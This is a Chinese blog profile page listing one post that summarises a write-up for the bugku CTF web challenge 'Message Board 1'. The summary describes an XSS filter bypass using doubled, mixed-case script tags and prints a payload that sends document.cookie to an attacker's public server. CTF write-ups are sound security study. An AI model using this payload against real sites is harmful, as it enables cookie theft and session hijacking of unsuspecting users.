- 博客(1)
- 收藏
- 关注
RSS订阅原创 bugku 平台-web-【留言板1】wp
本文介绍了bugku平台Web题【留言板1】的解题方法。题目需要利用XSS漏洞获取flag,通过双写+大写绕过过滤机制。payload使用了[img]<sCrSCriptipt>location.href="http://公网IP/?f="+document.cookie</ScScriptript>[/img]的形式,并在公网服务器上接收cookie信息。文中对比了该题与前作【留言板】的区别,指出本题无需登录admin.php即可完成攻击。
2025-07-13 03:34:45
815
2
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人